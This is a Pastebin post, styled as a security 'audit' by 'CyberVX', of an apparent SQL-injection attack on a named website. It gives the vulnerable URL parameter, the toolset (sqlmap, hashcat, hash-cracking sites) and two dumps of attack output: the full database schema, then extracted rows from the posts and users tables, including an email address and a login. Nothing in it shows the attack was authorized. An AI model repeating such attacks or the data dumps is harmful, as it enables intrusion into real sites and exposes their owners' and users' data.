Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Auditor: CyberVX
- - OS:
- # KALI LINUX;
- # WHONIX
- - TOOLS:
- # NMAP;
- # XPROBE2;
- # HASHCAT;
- # SQLMAP;
- - TOOLS SUPPORT:
- # https://crackstation.net/, https://www.onlinehashcrack.com/,
- # https://hashkiller.co.uk/md5-decrypter.aspx;
- - VULNERABILITY:
- # SQL INJECTION;
- # INSECURE CRYPTOGRAPHIC STORAGE;
- # FAILURE TO RESTRICT URL ACESS;
- - TARGET:
- # http://www.sallatykka.com
- # http://www.sallatykka.com/web/index.php?id=31
- ========================
- REPORT 1
- ========================
- web server operating system: Linux CentOS
- Available databases:
- [*] information_schema
- [*] sallatykkaco
- Database: sallatykkaco
- [16 tables]
- +-----------------------+
- | salla2_images |
- | salla2_pages |
- | salla_images |
- | salla_pages |
- | wp_commentmeta |
- | wp_comments |
- | wp_links |
- | wp_options |
- | wp_postmeta |
- | wp_posts |
- | wp_term_relationships |
- | wp_term_taxonomy |
- | wp_termmeta |
- | wp_terms |
- | wp_usermeta |
- | wp_users |
- +-----------------------+
- Database: sallatykkaco
- Table: salla2_pages
- [16 columns]
- +---------------+------------------------------------------+
- | Column | Type |
- +---------------+------------------------------------------+
- | language | enum('suomi','ruotsi','englanti','null') |
- | created_time | datetime |
- | end_time | datetime |
- | hidden | enum('true','false','link') |
- | id | int(11) |
- | link | varchar(255) |
- | modified_time | datetime |
- | parent | int(11) |
- | priority | int(11) |
- | start_time | datetime |
- | template | varchar(255) |
- | text1 | text |
- | text2 | text |
- | text3 | text |
- | text4 | text |
- | title | varchar(255) |
- +---------------+------------------------------------------+
- Database: sallatykkaco
- Table: wp_posts
- [23 columns]
- +-----------------------+---------------------+
- | Column | Type |
- +-----------------------+---------------------+
- | comment_count | bigint(20) |
- | comment_status | varchar(20) |
- | guid | varchar(255) |
- | ID | bigint(20) unsigned |
- | menu_order | int(11) |
- | ping_status | varchar(20) |
- | pinged | text |
- | post_author | bigint(20) unsigned |
- | post_content | longtext |
- | post_content_filtered | longtext |
- | post_date | datetime |
- | post_date_gmt | datetime |
- | post_excerpt | text |
- | post_mime_type | varchar(100) |
- | post_modified | datetime |
- | post_modified_gmt | datetime |
- | post_name | varchar(200) |
- | post_parent | bigint(20) unsigned |
- | post_password | varchar(20) |
- | post_status | varchar(20) |
- | post_title | text |
- | post_type | varchar(20) |
- | to_ping | text |
- +-----------------------+---------------------+
- Database: sallatykkaco
- Table: wp_term_taxonomy
- [6 columns]
- +------------------+---------------------+
- | Column | Type |
- +------------------+---------------------+
- | count | bigint(20) |
- | description | longtext |
- | parent | bigint(20) unsigned |
- | taxonomy | varchar(32) |
- | term_id | bigint(20) unsigned |
- | term_taxonomy_id | bigint(20) unsigned |
- +------------------+---------------------+
- Database: sallatykkaco
- Table: wp_commentmeta
- [4 columns]
- +------------+---------------------+
- | Column | Type |
- +------------+---------------------+
- | comment_id | bigint(20) unsigned |
- | meta_id | bigint(20) unsigned |
- | meta_key | varchar(255) |
- | meta_value | longtext |
- +------------+---------------------+
- Database: sallatykkaco
- Table: wp_users
- [10 columns]
- +---------------------+---------------------+
- | Column | Type |
- +---------------------+---------------------+
- | display_name | varchar(250) |
- | ID | bigint(20) unsigned |
- | user_activation_key | varchar(255) |
- | user_email | varchar(100) |
- | user_login | varchar(60) |
- | user_nicename | varchar(50) |
- | user_pass | varchar(255) |
- | user_registered | datetime |
- | user_status | int(11) |
- | user_url | varchar(100) |
- +---------------------+---------------------+
- Database: sallatykkaco
- Table: wp_terms
- [4 columns]
- +------------+---------------------+
- | Column | Type |
- +------------+---------------------+
- | name | varchar(200) |
- | slug | varchar(200) |
- | term_group | bigint(10) |
- | term_id | bigint(20) unsigned |
- +------------+---------------------+
- Database: sallatykkaco
- Table: wp_links
- [13 columns]
- +------------------+---------------------+
- | Column | Type |
- +------------------+---------------------+
- | link_description | varchar(255) |
- | link_id | bigint(20) unsigned |
- | link_image | varchar(255) |
- | link_name | varchar(255) |
- | link_notes | mediumtext |
- | link_owner | bigint(20) unsigned |
- | link_rating | int(11) |
- | link_rel | varchar(255) |
- | link_rss | varchar(255) |
- | link_target | varchar(25) |
- | link_updated | datetime |
- | link_url | varchar(255) |
- | link_visible | varchar(20) |
- +------------------+---------------------+
- Database: sallatykkaco
- Table: wp_comments
- [15 columns]
- +----------------------+---------------------+
- | Column | Type |
- +----------------------+---------------------+
- | comment_agent | varchar(255) |
- | comment_approved | varchar(20) |
- | comment_author | tinytext |
- | comment_author_email | varchar(100) |
- | comment_author_IP | varchar(100) |
- | comment_author_url | varchar(200) |
- | comment_content | text |
- | comment_date | datetime |
- | comment_date_gmt | datetime |
- | comment_ID | bigint(20) unsigned |
- | comment_karma | int(11) |
- | comment_parent | bigint(20) unsigned |
- | comment_post_ID | bigint(20) unsigned |
- | comment_type | varchar(20) |
- | user_id | bigint(20) unsigned |
- +----------------------+---------------------+
- Database: sallatykkaco
- Table: salla_images
- [4 columns]
- +------------+--------------------------------------+
- | Column | Type |
- +------------+--------------------------------------+
- | align | enum('left','center','right','null') |
- | file_name | varchar(255) |
- | id | int(11) |
- | image_name | varchar(255) |
- +------------+--------------------------------------+
- Database: sallatykkaco
- Table: wp_options
- [4 columns]
- +--------------+---------------------+
- | Column | Type |
- +--------------+---------------------+
- | autoload | varchar(20) |
- | option_id | bigint(20) unsigned |
- | option_name | varchar(191) |
- | option_value | longtext |
- +--------------+---------------------+
- Database: sallatykkaco
- Table: wp_usermeta
- [4 columns]
- +------------+---------------------+
- | Column | Type |
- +------------+---------------------+
- | meta_key | varchar(255) |
- | meta_value | longtext |
- | umeta_id | bigint(20) unsigned |
- | user_id | bigint(20) unsigned |
- +------------+---------------------+
- Database: sallatykkaco
- Table: wp_postmeta
- [4 columns]
- +------------+---------------------+
- | Column | Type |
- +------------+---------------------+
- | meta_id | bigint(20) unsigned |
- | meta_key | varchar(255) |
- | meta_value | longtext |
- | post_id | bigint(20) unsigned |
- +------------+---------------------+
- Database: sallatykkaco
- Table: salla_pages
- [14 columns]
- +---------------+------------------------------------------+
- | Column | Type |
- +---------------+------------------------------------------+
- | language | enum('suomi','ruotsi','englanti','null') |
- | created_time | datetime |
- | end_time | datetime |
- | hidden | enum('true','false','link') |
- | id | int(11) |
- | link | varchar(255) |
- | modified_time | datetime |
- | parent | int(11) |
- | priority | int(11) |
- | start_time | datetime |
- | template | varchar(255) |
- | text1 | text |
- | text2 | text |
- | title | varchar(255) |
- +---------------+------------------------------------------+
- Database: sallatykkaco
- Table: wp_term_relationships
- [3 columns]
- +------------------+---------------------+
- | Column | Type |
- +------------------+---------------------+
- | object_id | bigint(20) unsigned |
- | term_order | int(11) |
- | term_taxonomy_id | bigint(20) unsigned |
- +------------------+---------------------+
- Database: sallatykkaco
- Table: wp_termmeta
- [4 columns]
- +------------+---------------------+
- | Column | Type |
- +------------+---------------------+
- | meta_id | bigint(20) unsigned |
- | meta_key | varchar(255) |
- | meta_value | longtext |
- | term_id | bigint(20) unsigned |
- +------------+---------------------+
- Database: sallatykkaco
- Table: salla2_images
- [4 columns]
- +------------+--------------------------------------+
- | Column | Type |
- +------------+--------------------------------------+
- | align | enum('left','center','right','null') |
- | file_name | varchar(255) |
- | id | int(11) |
- | image_name | varchar(255) |
- +------------+--------------------------------------+
- ========================
- REPORT 2
- ========================
- Database: sallatykkaco
- Table: wp_posts
- [3 entries]
- +----------------+---------------+
- | post_name | post_password |
- +----------------+---------------+
- | <blank> | <blank> |
- | esimerkkisivu | <blank> |
- | moikka-maailma | <blank> |
- +----------------+---------------+
- Database: sallatykkaco
- Table: wp_users
- [1 entry]
- +---------------------------+--------------+------------+
- | user_email | user_pass | user_login |
- +---------------------------+--------------+------------+
- | lol.lol@tenminutemail.com | <blank> | D3moN |
- +---------------------------+--------------+------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement